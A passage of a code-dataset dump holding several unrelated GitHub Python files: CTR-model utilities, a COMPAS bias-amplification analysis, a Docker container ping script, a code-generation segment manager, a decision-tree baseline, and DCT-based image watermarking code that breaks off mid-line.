f:\n\tf.write(ac97File)\n","repo_name":"TheDeadFish/dbgLog","sub_path":"src/vbxlog/build_ac97.py","file_name":"build_ac97.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35030959709","text":"import pandas as pd\nimport numpy as np\nfrom scipy import sparse\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nimport tensorflow as tf\nfrom datetime import datetime\n\ndef restore_from_scope(scope):\n print(\"building saver to restore {0}\".format(scope))\n restore_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=scope)\n saver = tf.train.Saver(restore_vars)\n return saver\n\ndef get_init_opt(sess):\n print(\"getting uninitialized variables\")\n uninit_vars = []\n for var in tf.all_variables():\n try:\n sess.run(var)\n except tf.errors.FailedPreconditionError:\n uninit_vars.append(var)\n return tf.variables_initializer(uninit_vars)\n\ndef normalize_data(feats):\n \"\"\"\n input:\n feats: np array, obs*feats\n output:\n np array\n \"\"\"\n return (feats - feats.mean(axis=0)) / feats.std(axis=0)\n \ndef get_unique_random_idx(in_a, size, remove=True):\n if isinstance(in_a, int):\n a = np.arange(in_a)\n else:\n a = in_a\n if not isinstance(in_a, np.ndarray):\n raise ValueError(\"in_a should be either int or a numpy array\")\n\n if len(a) <= size:\n if remove:\n return a, None\n else:\n return a\n else:\n idx = np.random.choice(a, size, replace=False)\n if remove:\n a_set = set(list(a))\n idx_set = set(list(idx))\n out_a = np.asarray(list(a_set-idx_set), dtype=np.int64)\n return idx, out_a\n else:\n return idx\n\ndef delete_rows_mask(high, indices):\n if high < len(indices):\n raise ValueError(\"high must larger than num of indices\")\n else:\n mask = np.ones(high, dtype=bool)\n mask[indices] = False\n return mask\n\ndef get_raw_data(path=None, nrows=None):\n \"\"\"\n input:\n path: path to raw data\n nrows: number of lines want to load, None means all\n output:\n data: dataframe without the feature names\n feature2idx: a dict from feature to idx\n \"\"\"\n data = pd.read_csv(filepath_or_buffer=path,\n sep='\\s',\n nrows=nrows,\n header=None)\n feat2idx = {data.loc[0][i]:i for i in range(data.shape[1])}\n data = data.drop(0, axis=0)\n \n data[data.isnull()] = '-1'\n \n return data, feat2idx\n\n\ndef 
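In the utilities above, `normalize_data` is a per-column z-score and `delete_rows_mask` drops rows through a single boolean mask rather than repeated `np.delete` calls. A quick demonstration of both idioms on a toy matrix:

```python
import numpy as np

feats = np.arange(12, dtype=float).reshape(4, 3)

# Per-column z-score, as in normalize_data.
norm = (feats - feats.mean(axis=0)) / feats.std(axis=0)
print(norm.mean(axis=0))  # ~0 in every column

# Drop rows 1 and 3 with a boolean mask, as in delete_rows_mask.
mask = np.ones(feats.shape[0], dtype=bool)
mask[[1, 3]] = False
print(feats[mask])        # rows 0 and 2 remain
```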
get_int_histograms(data=None, col=None, is_int=False, do_plot=False):\n \"\"\"\n input:\n data: pandas dataframe, to be processed\n col: int, column to be counted\n is_numerical: bool, if the col data is numerical or not\n is_int: bool, if the col data is double\n acc: int, set the accuracy of double data\n do_plot: bool\n output:\n a dict of feature vs counts\n bad data rate\n \"\"\"\n bad_rate = 0.\n \n m, n = data.shape\n \n data[[n-1]] = data[[n-1]].apply(pd.to_numeric)\n if is_int:\n positive = 1\n bad_data = -1\n data[[col]] = data[[col]].apply(pd.to_numeric)\n else:\n positive = '1'\n bad_data = '-1'\n \n id_set = pd.Series.unique(data.loc[:][col]) \n \n if is_int:\n sorted(id_set)\n\n count_list = []\n \n for item in id_set:\n tmp_data = data.loc[data[col] == item]\n try:\n count_list.append(tmp_data[[n-1]].apply(pd.value_counts).loc[positive].values[0] / tmp_data.shape[0]) \n except:\n count_list.append(0.)\n \n out_dict = dict(zip(id_set, count_list))\n \n if do_plot:\n pd.DataFrame(out_dict, index=['feature {0}'.format(col)]).plot(kind='bar')\n plt.show()\n \n br = data[[col]].apply(pd.value_counts)/len(data[[col]])\n \n try:\n br = br.loc[bad_data].values[0]\n except:\n br = 0.\n \n print('rate of bad feature 14 is: ', br)\n \n return out_dict, br\n\n\"\"\"\npred1 = csv1['predicted_score']\npred2 = csv2['predicted_score']\npred3 = csv3['predicted_score']\nlist_of_preds = np.array([pred1, pred2, pred3]).T\n\ndef esemble(list_of_preds):\n x = np.mean(-np.log(1/list_of_preds - 1), axis=1)\n return 1 / (1 + np.exp(-x))\n\nres = esemble(list_of_preds)\nprint(res)\n\ncsv_esemble['predicted_score'] = res\ncsv_esemble.to_csv('/Users/yz/esemble_2.txt', index=False, sep=' ')\n\"\"\"\ndef esemble(list_of_preds):\n x = np.mean(-np.log(1/list_of_preds - 1), axis=1)\n return 1 / (1 + np.exp(-x))\n","repo_name":"chenyz0601/ctr-models","sub_path":"src/ctr_tensorflow/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"31419734383","text":"import matplotlib\nmatplotlib.use('Agg')\nimport pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\nimport matplotlib.pyplot as plt\nfrom sklearn import svm\nimport pickle\nfrom sklearn import tree\nfrom sklearn.metrics import accuracy_score, precision_score, roc_auc_score\nfrom sklearn.ensemble import BaggingClassifier\nfrom responsibly.dataset import COMPASDataset\nfrom sklearn.metrics import confusion_matrix\nimport sys\nsys.path.append('..')\nfrom utils import bog_task_to_attribute, bog_attribute_to_task\n\ncompas_ds = COMPASDataset()\n\n# two_year_recid as gt, and decile_score is what judges get\ndf = compas_ds.df\n\nthresholds = []\nfps = []\nbogs = []\naa_fps = []\nc_fps = []\naa_acc = []\nc_acc = []\n\nthis_cat = 'race'\n\n#for category in ['race', 'sex']:\nfor category in [this_cat]:\n for threshold in np.arange(0, 11):\n thresholds.append(threshold)\n print(\"----{0}----{1}------\".format(category, threshold))\n categories = list(df[category].unique())\n aa_fp = None\n c_fp = None\n for cat in categories:\n indices = np.where(np.array(df[category]) == cat)[0]\n y_true, y_pred = np.array(df['two_year_recid'])[indices], np.array(df['decile_score'])[indices] > threshold\n tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()\n if cat in ['African-American', 'Caucasian'] and category == 'race':\n print(\"{0}: TN - {1}, FP - {2}, FN - {3}, TP - {4}\".format(cat, tn, fp, fn, tp))\n print(\"TPR - {0}, FPR 
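`esemble` averages the member models in logit space, logit(p) = -log(1/p - 1) = log(p/(1-p)), then maps the mean back through the sigmoid; this is a geometric mean of the odds and differs from a plain average of the probabilities. A quick numeric check, restating the function so the snippet stands alone:

```python
import numpy as np

def esemble(list_of_preds):
    x = np.mean(-np.log(1 / list_of_preds - 1), axis=1)  # mean log-odds
    return 1 / (1 + np.exp(-x))

preds = np.array([[0.9, 0.9, 0.1]])
print(esemble(preds))      # ~0.675: logit-space mean (geometric mean of odds)
print(preds.mean(axis=1))  # ~0.633: plain probability average
```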
- {1}, FNR - {2}\".format(tp/(tp+fn), fp/(fp+tn), fn/(fn+tp)))\n if cat == 'African-American':\n aa_fp = fp/(fp+tn)\n aa_fps.append(aa_fp)\n aa_acc.append(np.mean(y_true == y_pred))\n else:\n c_fp = fp/(fp+tn)\n c_fps.append(c_fp)\n c_acc.append(np.mean(y_true == y_pred))\n print(\"Accuracy: {}:\".format(np.mean(y_true == y_pred)))\n elif category == 'sex' and cat == 'Female':\n aa_fp = fp/(fp+tn)\n aa_fps.append(aa_fp)\n aa_acc.append(np.mean(y_true == y_pred))\n elif category == 'sex' and cat == 'Male':\n c_fp = fp/(fp+tn)\n c_fps.append(c_fp)\n c_acc.append(np.mean(y_true == y_pred))\n if category == 'race':\n fps.append(aa_fp-c_fp)\n elif category == 'sex':\n fps.append(aa_fp-c_fp)\n\n bog_tilde = np.zeros((2, len(categories)))\n bog_gt_g = np.zeros((2, len(categories)))\n for i in df['race'].keys():\n this_cat_now = categories.index(df[category][i])\n gt_o = df['two_year_recid'][i]\n pred_o = int(df['decile_score'][i] > threshold)\n bog_tilde[gt_o][this_cat_now] += 1\n bog_gt_g[pred_o][this_cat_now] += 1\n\n if category == 'race':\n bog_tilde, bog_gt_g = bog_tilde[:, 1:3], bog_gt_g[:, 1:3]\n this_bog = bog_attribute_to_task(bog_tilde, bog_gt_g)\n bogs.append(this_bog)\n\nminority = ''\nmajority = ''\nprint(\"thiscat: {}\".format(this_cat))\nif this_cat == 'race':\n minority = 'Group 1'\n majority = 'Group 2'\nelif this_cat == 'sex':\n minority = 'Female'\n majority = 'Male'\n\nfig = plt.figure(figsize=(6, 3))\nax1 = fig.add_subplot(111)\nax1.plot(thresholds, aa_fps, label='{} FPR'.format(minority), c='C0')\nax1.plot(thresholds, c_fps, label='{} FPR'.format(majority), c='C1')\nax1.set_ylabel('FPR')\nax1.set_xlabel('Threshold')\n\nax2 = ax1.twinx()\nax2.plot(thresholds, np.array(bogs), label='BiasAmp ', c='C2')\nax2.plot(thresholds, [0]*len(thresholds), '--', c='k')\nax2.set_ylabel('Bias Amplification', color='k')\nfig.legend(bbox_to_anchor=(1.15, 1.1))\nplt.tight_layout()\nplt.savefig('recidivism_thresholds.png', dpi=400)\nplt.close()\n","repo_name":"princetonvisualai/directional-bias-amp","sub_path":"compas/recidivism_classifier.py","file_name":"recidivism_classifier.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"67"} +{"seq_id":"38541598081","text":"import subprocess\nimport platform\n\n# Docker container names and their IPs\nips = {\n 'container1': '172.17.0.2',\n 'container2': '172.17.0.3',\n 'container3': '172.17.0.4',\n}\n\ndef ping(src_container: str, dest_ip: str) -> bool:\n \"\"\"\n Returns True if host (str) responds to a ping request from the given Docker container.\n \"\"\"\n command = ['docker', 'exec', '-it', src_container, 'ping', '-c', '1', dest_ip]\n\n return subprocess.call(command, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) == 0\n\nfor container in ips.keys():\n for ip in ips.values():\n if ips[container] != ip: # Do not ping the container itself\n result = ping(container, ip)\n print(f\"Ping from {container} to IP {ip} {'succeeded' if result else 'failed'}\")\n\n","repo_name":"nbashant/PingUseCase","sub_path":"UseCaseBot/TERMINAL_ping_containers.py","file_name":"TERMINAL_ping_containers.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20911456442","text":"import json\nimport logging\nimport os\nimport shutil\n\nfrom pathlib import Path\n\nfrom jinja2 import FileSystemLoader, Environment\nfrom jsonschema import validate\nfrom munch import munchify\n\nfrom 
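The per-group rates above come straight from confusion-matrix counts: TPR = tp/(tp+fn), FPR = fp/(fp+tn), FNR = fn/(fn+tp). A numpy-only check on toy labels (sklearn's `confusion_matrix(...).ravel()` returns the same four counts in tn, fp, fn, tp order):

```python
import numpy as np

y_true = np.array([1, 1, 0, 0, 1, 0])
y_pred = np.array([1, 0, 1, 0, 1, 0])

tp = np.sum((y_true == 1) & (y_pred == 1))  # 2
fn = np.sum((y_true == 1) & (y_pred == 0))  # 1
fp = np.sum((y_true == 0) & (y_pred == 1))  # 1
tn = np.sum((y_true == 0) & (y_pred == 0))  # 2

print("TPR", tp / (tp + fn))  # 2/3
print("FPR", fp / (fp + tn))  # 1/3
```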
fashion.util import cd\n\n# JSON schema to validate a segment object/file.\nsegmentSchema = {\n \"definitions\": {},\n \"$schema\": \"http://json-schema.org/draft-07/schema#\",\n \"$id\": \"http://fashion.com/segment.json\",\n \"type\": \"object\",\n \"title\": \"Segment Schema\",\n \"required\": [\n \"name\",\n \"version\",\n ],\n \"properties\": {\n \"name\": {\n \"$id\": \"#/properties/name\",\n \"type\": \"string\",\n \"minLength\": 1,\n \"title\": \"Name of the segment\",\n \"default\": \"\",\n \"examples\": [\n \"fashion.core\"\n ],\n \"pattern\": \"^(.*)$\"\n },\n \"version\": {\n \"$id\": \"#/properties/version\",\n \"type\": \"string\",\n \"minLength\": 1,\n \"title\": \"Version of the segment\",\n \"default\": \"\",\n \"examples\": [\n \"1.0.0\"\n ],\n \"pattern\": \"^(.*)$\"\n },\n \"description\": {\n \"$id\": \"#/properties/description\",\n \"type\": \"string\",\n \"title\": \"A description of the segment\",\n \"default\": \"\",\n \"examples\": [\n \"fashion core segment\"\n ],\n \"pattern\": \"^(.*)$\"\n },\n \"templatePath\": {\n \"$id\": \"#/properties/templatePath\",\n \"type\": \"array\",\n \"title\": \"Template path list relative to segment file directory\",\n \"items\": {\n \"$id\": \"#/properties/templatePath/items\",\n \"type\": \"string\",\n \"title\": \"A template path\",\n \"default\": \"\",\n \"examples\": [\n \"./template\"\n ],\n \"pattern\": \"^(.*)$\"\n }\n },\n \"schema\": {\n \"$id\": \"#/properties/schema\",\n \"type\": \"array\",\n \"title\": \"A list of schemas for this segment\",\n \"items\": {\n \"$id\": \"#/properties/schema/items\",\n \"type\": \"object\",\n \"title\": \"The Items Schema\",\n \"required\": [\n \"kind\",\n \"filename\"\n ],\n \"properties\": {\n \"kind\": {\n \"$id\": \"#/properties/schema/items/properties/kind\",\n \"type\": \"string\",\n \"title\": \"The Kind Schema\",\n \"default\": \"\",\n \"examples\": [\n \"fashion.core.generate.jinja2.spec\"\n ],\n \"pattern\": \"^(.*)$\"\n },\n \"filename\": {\n \"$id\": \"#/properties/schema/items/properties/filename\",\n \"type\": \"string\",\n \"title\": \"The Filename Schema\",\n \"default\": \"\",\n \"examples\": [\n \"./schema/generateJinja2.json\"\n ],\n \"pattern\": \"^(.*)$\"\n }\n }\n }\n },\n \"xformConfig\": {\n \"$id\": \"#/properties/xformConfig\",\n \"type\": \"array\",\n \"title\": \"The Xformconfig Schema\",\n \"items\": {\n \"$id\": \"#/properties/xformConfig/items\",\n \"type\": \"object\",\n \"title\": \"The Items Schema\",\n \"required\": [\n \"moduleName\",\n ],\n \"properties\": {\n \"moduleName\": {\n \"$id\": \"#/properties/xformConfig/items/properties/moduleName\",\n \"type\": \"string\",\n \"title\": \"The Modulename Schema\",\n \"default\": \"\",\n \"examples\": [\n \"fashion.core.generate.jinja2\"\n ],\n \"pattern\": \"^(.*)$\"\n },\n \"tags\": {\n \"$id\": \"#/properties/xformConfig/items/properties/tags\",\n \"type\": \"array\",\n \"title\": \"The Tags Schema\",\n \"items\": {\n \"$id\": \"#/properties/xformConfig/items/properties/tags/items\",\n \"type\": \"string\",\n \"title\": \"The Items Schema\",\n \"default\": \"\",\n \"examples\": [\n \"output\"\n ],\n \"pattern\": \"^(.*)$\"\n }\n },\n \"parameters\": {\n \"$id\": \"#/properties/xformConfig/items/properties/parameters\",\n \"type\": \"object\",\n \"title\": \"The Parameters Schema\"\n }\n }\n }\n },\n \"segmentRefs\": {\n \"$id\": \"#/properties/segmentRefs\",\n \"type\": \"array\",\n \"title\": \"The Segmentrefs Schema\",\n \"items\": {\n \"$id\": \"#/properties/segmentRefs/items\",\n \"type\": 
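The segment schema above makes `name` and `version` required, non-empty strings; `jsonschema.validate` raises `ValidationError` on anything that does not conform. A minimal check against a cut-down version of the same schema, assuming the `jsonschema` package is installed:

```python
from jsonschema import validate, ValidationError

schema = {
    "type": "object",
    "required": ["name", "version"],
    "properties": {
        "name": {"type": "string", "minLength": 1},
        "version": {"type": "string", "minLength": 1},
    },
}

validate({"name": "local", "version": "1.0.0"}, schema)  # passes silently
try:
    validate({"name": "local"}, schema)                  # "version" is missing
except ValidationError as e:
    print(e.message)
```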
\"string\",\n \"title\": \"A reference to another required segment\",\n \"default\": \"\",\n \"examples\": [\n \"fashion.core\"\n ],\n \"pattern\": \"^(.*)$\"\n }\n },\n \"extraFiles\": {\n \"$id\": \"#/properties/extraFiles\",\n \"type\": \"array\",\n \"title\": \"The Extrafiles Schema\",\n \"items\": {\n \"$id\": \"#/properties/extraFiles/items\",\n \"type\": \"string\",\n \"title\": \"The Items Schema\",\n \"default\": \"\",\n \"examples\": [\n \"./model/fashionPrime.json\"\n ],\n \"pattern\": \"^(.*)$\"\n }\n }\n }\n}\n\n\ndef createDefaultXform(templatePath, targetFile, templateFile=\"defaultXformTemplate.py\", model={}):\n '''\n Create a default xform module file.\n\n :param list(string) templatePath: ordered list of search paths for template files.\n :param Path targetFile: the xform module file to write.\n :param string templateFile: the template to use to generate the xform code.\n :param dictionary model: the model passed to the xform source code generator.\n :returns: True if succeeded.\n :rtype: boolean\n '''\n if targetFile.exists():\n logging.error(\n \"xform module file already exists: {0}\".format(targetFile))\n return False\n env = Environment(loader=FileSystemLoader(templatePath))\n template = env.get_template(templateFile)\n result = template.render(model)\n try:\n targetFile.makedir(parents=True, exist_ok=True)\n except:\n pass\n with targetFile.open(mode=\"w\") as tf:\n tf.write(result)\n return True\n\n\nclass Segment(object):\n '''A collection of fashion resources.'''\n\n def __init__(self, filename):\n '''\n Initialize a new local segment.\n\n :param Path filename: the segment JSON file.\n '''\n self.properties = munchify({\n \"name\": \"local\",\n \"version\": \"1.0.0\",\n \"description\": \"fashion segment\",\n \"templatePath\": ['./template'],\n \"defaultModelPath\": './model',\n \"defaultSchemaPath\": './schema',\n \"defaultTemplatePath\": './template',\n \"defaultXformPath\": './xform',\n \"libPath\": \"./lib\",\n \"schema\": [],\n \"segmentRefs\": [\"fashion.core\"],\n \"xformConfig\": [],\n \"extraFiles\": []\n })\n self.filename = filename\n self.absFilename = self.filename.absolute()\n self.absDirname = self.absFilename.parent\n\n @staticmethod\n def load(filename):\n '''\n Load a segment description from a JSON file.\n\n :param Path filename: the location of the segment JSON file.\n :returns: the loaded Segment object.\n :rtype: Segment object\n '''\n with filename.open(mode='r') as fd:\n segment = Segment(filename)\n segment.properties = munchify(json.loads(fd.read()))\n if \"templatePath\" not in segment.properties:\n segment.properties.templatePath = []\n segment.validate()\n return segment\n\n @staticmethod\n def create(segdir, segname):\n '''\n Create a new segment.\n\n :param Path segdir: the location of the segment JSON file.\n :param string segname: the name of the segment.\n :returns: the created Segment object.\n :rtype: Segment object\n '''\n newSeg = Segment(segdir / \"segment.json\")\n newSeg.properties.name = segname\n newSeg.createDirectories()\n newSeg.save()\n return newSeg\n\n def findModuleDefinitions(self):\n xformModules = []\n with cd(self.absDirname / \"xform\"):\n for root, _, files in os.walk(\".\"):\n if os.path.basename(root) != '__pycache__':\n for file in files:\n p = Path(root) / Path(file)\n filename = Path(\"xform\") / p\n mod = [self.properties.name]\n mod.extend(p.parts[0:-1])\n mod.append(p.stem)\n modName = \".\".join(mod)\n modDef = {\n \"moduleName\": modName,\n \"filename\": str(filename.as_posix()),\n 
\"templatePath\": self.properties.templatePath\n }\n xformModules.append(modDef)\n return xformModules\n\n def getAbsPath(self, filename):\n '''\n Translate filename relative to this segment.\n\n :param Path filename: the relative filename to translate.\n :returns: the absolute path of the filename.\n :rtype: Path\n '''\n with cd(self.absDirname):\n return filename.absolute()\n\n def save(self):\n '''\n Save a segment description to a JSON file.\n '''\n self.validate()\n with self.absFilename.open(mode=\"w\") as sf:\n sf.write(self.properties.toJSON(indent=4))\n\n def createDirectories(self):\n '''\n Create default directories for this segment.\n '''\n self.absDirname.mkdir(parents=True, exist_ok=True)\n (self.absDirname / \"model\").mkdir(parents=True, exist_ok=True)\n (self.absDirname / \"schema\").mkdir(parents=True, exist_ok=True)\n (self.absDirname / \"template\").mkdir(parents=True, exist_ok=True)\n (self.absDirname / \"xform\").mkdir(parents=True, exist_ok=True)\n\n def xformExists(self, xformName):\n '''\n Test if an xform exists in this segment.\n\n :param string xformName: name of xform to test.\n :returns: True if xform exists.\n :rtype: boolean\n '''\n filename = Path(xformName + \".py\")\n targetFile = Path(self.properties.defaultXformPath) / filename\n with cd(self.absDirname):\n return targetFile.exists()\n\n def deleteXform(self, xformName):\n '''\n Delete an xform from this segment.\n\n :param string xformName: name of xform to delete.\n '''\n filename = Path(xformName + \".py\")\n targetFile = Path(self.properties.defaultXformPath) / filename\n with cd(self.absDirname):\n if targetFile.exists():\n targetFile.unlink()\n moduleName = xformName\n modDefs = [\n x for x in self.properties.xformModules if x.moduleName != moduleName]\n self.properties.xformModules = modDefs\n moduleName = self.properties.name + \".\" + xformName\n modCfgs = [\n x for x in self.properties.xformConfig if x.moduleName != moduleName]\n self.properties.xformConfig = modCfgs\n self.save()\n\n def createXform(self, xformName, templatePath, templateFile=\"defaultXformTemplate.py\", model={}, moduleName=None):\n '''\n Create an xform module in this segment.\n\n :param string xformName: name of xform to create.\n :param list(string) templatePath: ordered list of search paths for template files.\n :param string templateFile: the template to use to generate the xform code.\n :param dictionary model: the model passed to the xform source code generator.\n :param string moduleName: the moduleName for this xform module, else default is same as xformName.\n :returns: True if succeeded.\n :rtype: boolean\n '''\n with cd(self.absDirname):\n filename = Path(xformName + \".py\")\n targetFile = Path(self.properties.defaultXformPath) / filename\n if moduleName is None:\n moduleName = filename.stem\n if not createDefaultXform(templatePath, targetFile, templateFile=templateFile, model=model):\n print(\"Failed!\")\n else:\n self.properties.xformModules.append({\n \"moduleName\": moduleName,\n \"filename\": targetFile.as_posix(),\n \"inputKinds\": [],\n \"outputKinds\": [],\n \"tags\": []\n })\n self.properties.xformConfig.append({\n \"moduleName\": self.properties.name + \".\" + moduleName,\n \"parameters\": {},\n \"tags\": []\n })\n self.save()\n return True\n\n def templateExists(self, filename):\n '''\n Test if a template exists in this segement.\n\n :param Path filename: relative filename of template file.\n :returns: True if exists.\n :rtype: boolean\n '''\n with cd(self.absDirname):\n with 
cd(self.properties.defaultTemplatePath):\n absDst = filename.absolute()\n return absDst.exists()\n\n def deleteTemplate(self, filename):\n '''\n Delete a template from this segment.\n\n :param Path filename: relative filename of template file.\n :returns: True if success.\n :rtype: boolean\n '''\n with cd(self.absDirname):\n with cd(self.properties.defaultTemplatePath):\n absDst = filename.absolute()\n if absDst.exists():\n absDst.unlink()\n return True\n\n def createTemplate(self, filename):\n '''\n Create a template in this segment from a file.\n\n :param Path filename: filename of template file, relative to portfolio project directory.\n :returns: True if success.\n :rtype: boolean\n '''\n absFn = filename.absolute()\n with cd(self.absDirname):\n with cd(self.properties.defaultTemplatePath):\n absDst = filename.absolute()\n try:\n absDst.parent.mkdir(parents=True, exist_ok=True)\n except:\n pass\n shutil.copy(absFn.as_posix(), absDst.as_posix())\n return True\n\n def createSchema(self, kind, schema):\n '''\n Create a JSON schema file for a model kind.\n\n :param string kind: model kind for schema.\n :param JSONobject schema: the schema for model kind.\n '''\n filename = Path(self.properties.defaultSchemaPath) / \\\n Path(kind + \".json\")\n with cd(self.absDirname):\n with filename.open(mode=\"w\") as fp:\n json.dump(schema, fp, indent=4)\n self.properties.schema.append({\n \"kind\": kind,\n \"filename\": str(filename)\n })\n self.save()\n\n def validate(self):\n '''\n Validate this Segment object against a schema.\n\n :raises: jsonschema.exceptions.ValidationError if invalid.\n '''\n validate(self.properties, segmentSchema)\n","repo_name":"braddillman/fashion","sub_path":"fashion/segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":17450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"16227189897","text":"\r\n# -*- coding: utf-8 -*-\r\n\r\n# 引入模块\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nimport pandas as pd\r\n\r\n# 读取数据\r\ntrain = pd.read_csv(\"train.csv\")\r\ntest = pd.read_csv(\"test.csv\")\r\nsubmit = pd.read_csv(\"sample_submit.csv\")\r\n\r\n\r\n\r\n#预览一下\r\nprint(train.head())\r\nprint(test.head())\r\nprint(submit.head())\r\n\r\n\r\n\r\n# 取出训练集的y\r\ny_train = train.pop('y')\r\n\r\n#building\r\nclf = DecisionTreeRegressor()\r\nclf.fit(train, y_train)\r\ny_pred = clf.predict(test)\r\n\r\n#决策树模型会依照数据的标签为每个条件进行决策分类\r\n\r\n# 输出预测结果至my_DT_prediction.csv\r\nsubmit['y'] = y_pred\r\nsubmit.to_csv('my_DT_prediction.csv', index=False)\r\n\r\n\r\nprint(\"success!\")\r\n","repo_name":"snowflowersnowflake/modelForDT_master","sub_path":"modelForDT/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"40724094608","text":"import cv2\r\nimport numpy as np\r\nfrom skimage import io, color, util, transform, filters\r\nfrom tqdm import trange\r\nimport cv2 as cv\r\nimport random\r\nfrom matplotlib import pyplot as plt\r\nfrom skimage.metrics import structural_similarity as ssim\r\n\r\n\r\ndef Arnold(img):\r\n row, col = img.shape\r\n p = np.zeros((row, col))\r\n a = 1\r\n b = 1\r\n for i in range(row):\r\n for j in range(col):\r\n x = (i + b * j) % row\r\n y = (a * i + (a * b + 1) * j) % col\r\n p[x, y] = img[i, j]\r\n return p\r\n\r\n\r\ndef dearnold(img):\r\n row, col = img.shape\r\n p = np.zeros((row, col))\r\n a = 1\r\n b = 1\r\n for i in range(row):\r\n for j in 
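`Arnold`/`dearnold` implement the cat map x' = (i + b·j) mod N, y' = (a·i + (a·b+1)·j) mod N and its exact inverse (the transform matrix [[1, b], [a, ab+1]] has determinant 1). A self-contained check that the inverse really undoes the scramble, restating both maps compactly; it assumes a square input, as the 32×32 watermark here is:

```python
import numpy as np

def arnold(img, a=1, b=1):
    n = img.shape[0]
    out = np.zeros_like(img)
    for i in range(n):
        for j in range(n):
            out[(i + b * j) % n, (a * i + (a * b + 1) * j) % n] = img[i, j]
    return out

def dearnold(img, a=1, b=1):
    n = img.shape[0]
    out = np.zeros_like(img)
    for i in range(n):
        for j in range(n):
            out[((a * b + 1) * i - b * j) % n, (-a * i + j) % n] = img[i, j]
    return out

img = np.arange(16).reshape(4, 4)
assert np.array_equal(dearnold(arnold(img)), img)  # exact round trip
```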
range(col):\r\n x = ((a * b + 1) * i - b * j) % row\r\n y = (-a * i + j) % col\r\n p[x, y] = img[i, j]\r\n return p\r\n\r\n\r\n# division函数由按行不动 列先动分块\r\ndef division(img):\r\n row, col = img.shape\r\n begin_r = begin_c = 0\r\n end_r = end_c = 8\r\n t = []\r\n for i in range(int(row * col / 64)):\r\n if begin_r == row:\r\n begin_r = 0\r\n end_r = 8\r\n begin_c = end_c\r\n end_c += 8\r\n block = img[begin_c:end_c, begin_r:end_r] # 二维数组切片操作 以逗号换维,第一维是行 第二维是列\r\n t.append(block)\r\n begin_r = end_r\r\n end_r += 8\r\n return t\r\n\r\n\r\ndef DCT_2D(x):\r\n '''\r\n Discrete space cosine transform\r\n x: Input matrix\r\n '''\r\n N1, N2 = x.shape\r\n X = np.zeros((N1, N2))\r\n n1, n2 = np.mgrid[0:N1, 0:N2]\r\n for w1 in range(N1):\r\n for w2 in range(N2):\r\n l1 = (2 / N1) ** 0.5 if w1 else (1 / N1) ** 0.5\r\n l2 = (2 / N2) ** 0.5 if w2 else (1 / N2) ** 0.5\r\n cos1 = np.cos(np.pi * w1 * (2 * n1 + 1) / (2 * N1))\r\n cos2 = np.cos(np.pi * w2 * (2 * n2 + 1) / (2 * N2))\r\n X[w1, w2] = l1 * l2 * np.sum(x * cos1 * cos2)\r\n return X\r\n\r\n\r\ndef iDCT2D(X, shift=True):\r\n '''\r\n Inverse discrete space cosine transform\r\n X: Input spectrum matrix\r\n '''\r\n N1, N2 = X.shape\r\n x = np.zeros((N1, N2))\r\n k1, k2 = np.mgrid[0:N1, 0:N2]\r\n l1 = np.ones((N1, N2)) * (2 / N1) ** 0.5\r\n l2 = np.ones((N1, N2)) * (2 / N2) ** 0.5\r\n l1[0] = (1 / N1) ** 0.5;\r\n l2[:, 0] = (1 / N2) ** 0.5\r\n for n1 in range(N1):\r\n for n2 in range(N2):\r\n cos1 = np.cos(np.pi * k1 * (2 * n1 + 1) / (2 * N1))\r\n cos2 = np.cos(np.pi * k2 * (2 * n2 + 1) / (2 * N2))\r\n x[n1, n2] = np.sum(l1 * l2 * X * cos1 * cos2)\r\n return x\r\n\r\n\r\n# 乘性扰动算法\r\ndef Mul_Disturbance(DCT_list, Watermark):\r\n # DCT_list.astype(float) # 第34个矩阵本应减小却增大 //0 为该处的像素值\r\n list_DCT_Mul = []\r\n a = 0.01 # 论文为0.04\r\n row, col = Watermark.shape\r\n z = 0\r\n for i in range(col):\r\n for j in range(row):\r\n if Watermark[i][j] == 0:\r\n list_DCT_Mul.append(DCT_list[z] * (1 - a))\r\n else:\r\n list_DCT_Mul.append(DCT_list[z] * (1 + a))\r\n z += 1\r\n return list_DCT_Mul\r\n\r\n\r\ndef Merge(Carrier, iDCT_list):\r\n row, col = Carrier.shape\r\n begin_r = begin_c = 0\r\n end_r = end_c = 8\r\n for i in range(len(iDCT_list)):\r\n if begin_r == row:\r\n begin_r = 0\r\n end_r = 8\r\n begin_c = end_c\r\n end_c += 8\r\n Carrier[begin_c:end_c, begin_r:end_r] = iDCT_list[i]\r\n begin_r = end_r\r\n end_r += 8\r\n\r\n\r\n# 水印提取是水印嵌入的逆过程\r\ndef WaterMark_extract(Carrier_R, Carrier_DCT): # 传参时候传入list 和 Carrier_DCT\r\n list_extract = []\r\n WaterMark = np.zeros((32, 32))\r\n block1 = np.zeros((8, 8), dtype='float')\r\n block2 = np.zeros((8, 8), dtype='float')\r\n block_original = np.zeros((8, 8))\r\n block_extract = np.zeros((8, 8))\r\n # 先进行分块\r\n list_original = division(Carrier_R)\r\n list_extract = division(Carrier_DCT)\r\n # 分别进行DCT变换\r\n for i in trange(len(list_original)):\r\n # list_extract[i] = DCT_2D(list_extract[i])\r\n # list_original[i] = DCT_2D(list_original[i])\r\n block1 = list_original[i]\r\n block2 = list_extract[i]\r\n list_original[i] = cv.dct(block1)\r\n list_extract[i] = cv.dct(block2)\r\n # 通过比较原图像与嵌入后的数值大小来判断水印值\r\n j = k = 0\r\n for i in range(len(list_original)):\r\n block_original = 